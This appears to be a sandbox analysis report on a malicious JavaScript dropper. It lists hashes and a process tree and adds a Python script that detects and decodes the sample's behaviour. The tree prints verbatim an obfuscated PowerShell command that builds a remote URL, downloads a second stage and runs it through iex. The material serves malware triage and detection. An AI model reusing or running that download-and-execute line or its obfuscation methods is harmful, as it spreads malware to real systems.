Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/09/2024, 01:48

General

  • Target

    d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb.js

  • Size

    161KB

  • MD5

    b512c5344d56be176dc6282505423b33

  • SHA1

    4275c3b4bfd7a727fb1f99e446aa593cd1e818e9

  • SHA256

    d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb

  • SHA512

    8d7bb8d90249274c40e8ad5da34c9fc722822ac568d59568d3ec03c424bf306a1df4729489cb2970fe791d52d61242fa0885258ba9169f33f57a214ea383a31a

  • SSDEEP

    3072:F19MCBKsJpYS5v+OXpQNMZvjI/drwM/11sluyAhhun7rSsuosqUYRLu2h:F19Bpv5eN+G+u1128heSsuoHv

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro. Here the parent is wscript.exe executing the submitted .js, which launches PowerShell through conhost.exe --headless (PID 2524 in the process tree below).

  • Command and Scripting Interpreter: JavaScript (1 TTP)

Processes

  • C:\Windows\system32\wscript.exe (PID 1800)
    wscript.exe C:\Users\Admin\AppData\Local\Temp\d86f62bb56299715391f8e7dad41c81283c58899d7e279e5c45ffe07b0ac47eb.js
    • C:\Windows\system32\conhost.exe (PID 2524, child of wscript.exe; triggers "Process spawned unexpected child process")
      conhost --headless powershell $hsyiudsm='ur';new-alias press c$($hsyiudsm)l;$tjkynnpwl=(8298,8316,8302,8308,8303,8299,8308,8301,8315,8314,8318,8312,8314,8243,8313,8308,8309,8244,8246,8243,8309,8301,8309,8260,8312,8258,8306,8302,8307,8313,8312,8246,8248);$iocwczrw=('bronx','get-cmdlet');$yvobsbusq=$tjkynnpwl;foreach($tufmfwmboixhx in $yvobsbusq){$xdnbtdmwzz=$tufmfwmboixhx;$sdyydtctssg=$sdyydtctssg+[char]($xdnbtdmwzz-8197);$rcqleiqlja=$sdyydtctssg;$vfftsj=$rcqleiqlja};$dtaamplwesbf[2]=$vfftsj;$ojfnycdqq='rl';$pdozqnclcy=1;.$([char](9992-9887)+'e'+'x')(press -useb $vfftsj)
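The decoding and detection logic a triage analyst would want for the two findings on this page (the "unexpected child process" signature and the obfuscated PowerShell line of PID 2524), as an added Python example that is not part of the sandbox report or the sample. The conhost command line is copied verbatim from the tree above; the process records are constructed to mirror that tree (the cmd.exe to conhost.exe launch is invented as a negative case), the ProcEvent field names and the regex heuristics are my own, and the decoder assumes the straight-line shape this sample has: one integer array, one [char]($v-offset) loop, plain variable-to-variable copies, and a final .$(...)(...) invocation.

```python
import re
from dataclasses import dataclass

# Command line of PID 2524, copied verbatim from the process tree above and
# split over adjacent literals only to keep lines short.
CONHOST_CMDLINE = (
    "conhost --headless powershell $hsyiudsm='ur';new-alias press c$($hsyiudsm)l;"
    "$tjkynnpwl=(8298,8316,8302,8308,8303,8299,8308,8301,8315,8314,8318,8312,8314,"
    "8243,8313,8308,8309,8244,8246,8243,8309,8301,8309,8260,8312,8258,8306,8302,"
    "8307,8313,8312,8246,8248);$iocwczrw=('bronx','get-cmdlet');$yvobsbusq=$tjkynnpwl;"
    "foreach($tufmfwmboixhx in $yvobsbusq){$xdnbtdmwzz=$tufmfwmboixhx;"
    "$sdyydtctssg=$sdyydtctssg+[char]($xdnbtdmwzz-8197);$rcqleiqlja=$sdyydtctssg;"
    "$vfftsj=$rcqleiqlja};$dtaamplwesbf[2]=$vfftsj;$ojfnycdqq='rl';$pdozqnclcy=1;"
    ".$([char](9992-9887)+'e'+'x')(press -useb $vfftsj)"
)


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape, not the sandbox's export)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


# One record rebuilt from the tree above plus one constructed benign conhost
# launch (cmd.exe attaching a console host) to show the rule stays quiet on it.
EVENTS = [
    ProcEvent(2524, r"C:\Windows\system32\conhost.exe", CONHOST_CMDLINE,
              r"C:\Windows\system32\wscript.exe"),
    ProcEvent(4100, r"C:\Windows\system32\conhost.exe",
              r"\??\C:\Windows\system32\conhost.exe 0x4",
              r"C:\Windows\system32\cmd.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "conhost.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_child(ev: ProcEvent) -> list[str]:
    """Reasons this event matches the 'unexpected child process' signature."""
    hits = []
    if basename(ev.parent_image) in SCRIPT_HOSTS and basename(ev.image) in INTERPRETERS:
        hits.append("script host spawned an interpreter")
    if re.search(r"--headless\s+powershell", ev.cmdline, re.I):
        hits.append("conhost --headless used as a PowerShell launcher")
    if re.search(r"\bnew-alias\b", ev.cmdline, re.I):
        hits.append("cmdlet renamed with new-alias")
    if re.search(r"\[char\]\(\s*\d+\s*-\s*\d+\s*\)", ev.cmdline, re.I):
        hits.append("[char] arithmetic builds a command name")
    if re.search(r"\(\s*\d{3,5}(?:\s*,\s*\d{3,5}){8,}\s*\)", ev.cmdline):
        hits.append("long integer array (offset-encoded string)")
    return hits


def decode_offset_string(cmd: str) -> str:
    """Rebuild the string the foreach loop assembles: chr(n - offset) per element."""
    nums = re.search(r"\(\s*(\d+(?:\s*,\s*\d+)+)\s*\)", cmd).group(1)
    offset = int(re.search(r"\[char\]\(\$\w+-(\d+)\)", cmd).group(1))
    return "".join(chr(int(n) - offset) for n in nums.split(","))


def resolve_aliases(cmd: str) -> dict[str, str]:
    """Map new-alias names to targets, expanding $($var) from 'literal' assignments."""
    literals = dict(re.findall(r"\$(\w+)='([^']*)'", cmd))
    return {
        alias: re.sub(r"\$\(\$(\w+)\)", lambda m: literals.get(m.group(1), m.group(0)), target)
        for alias, target in re.findall(r"new-alias\s+(\S+)\s+(\S+?);", cmd)
    }


def char_concat(expr: str) -> str:
    """Evaluate a PowerShell concatenation of [char](A-B) pieces and 'literals'."""
    out = []
    for m in re.finditer(r"\[char\]\((\d+)(?:-(\d+))?\)|'([^']*)'", expr):
        out.append(chr(int(m.group(1)) - int(m.group(2) or 0)) if m.group(1) else m.group(3))
    return "".join(out)


def deobfuscate(cmd: str) -> str:
    """Resolve the final '.$(...)(...)' invocation to a readable PowerShell line."""
    decoded = decode_offset_string(cmd)
    accumulator = re.search(r"\$(\w+)=\$\1\+\[char\]", cmd).group(1)
    chain = dict(re.findall(r"\$(\w+)=\$(\w+)[;}]", cmd))  # dst -> src plain copies

    def origin(name: str) -> str:  # follow copies back to the variable they came from
        seen = set()
        while name in chain and name not in seen:
            seen.add(name)
            name = chain[name]
        return name

    verb, args = re.search(r"\.\$\((.+?)\)\((.+?)\)$", cmd).groups()
    args = re.sub(r"\$(\w+)", lambda m: decoded if origin(m.group(1)) == accumulator else m.group(0), args)
    aliases = resolve_aliases(cmd)
    return f"{char_concat(verb)} ({' '.join(aliases.get(t, t) for t in args.split())})"


if __name__ == "__main__":
    for ev in EVENTS:
        hits = suspicious_child(ev)
        print(ev.pid, basename(ev.image), hits)
        if hits:
            print("  decodes to:", deobfuscate(ev.cmdline))
```

Running the block prints the hits for each record and, for PID 2524, the decoded line, which peels the three layers the sample stacks: the alias press is built as c + 'ur' + l, that is curl, which in Windows PowerShell is an alias of Invoke-WebRequest (with -useb short for -UseBasicParsing); the verb is iex (Invoke-Expression) with its first letter computed as [char](9992-9887); and the integer array minus 8197 is the location the second stage is fetched from. That host and path are the indicator to block and hunt for. The variables $iocwczrw, $ojfnycdqq, $pdozqnclcy and $dtaamplwesbf are assigned but never read; they exist only to pad the pattern and should not distract a signature writer.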

    Network

          MITRE ATT&CK Enterprise v15
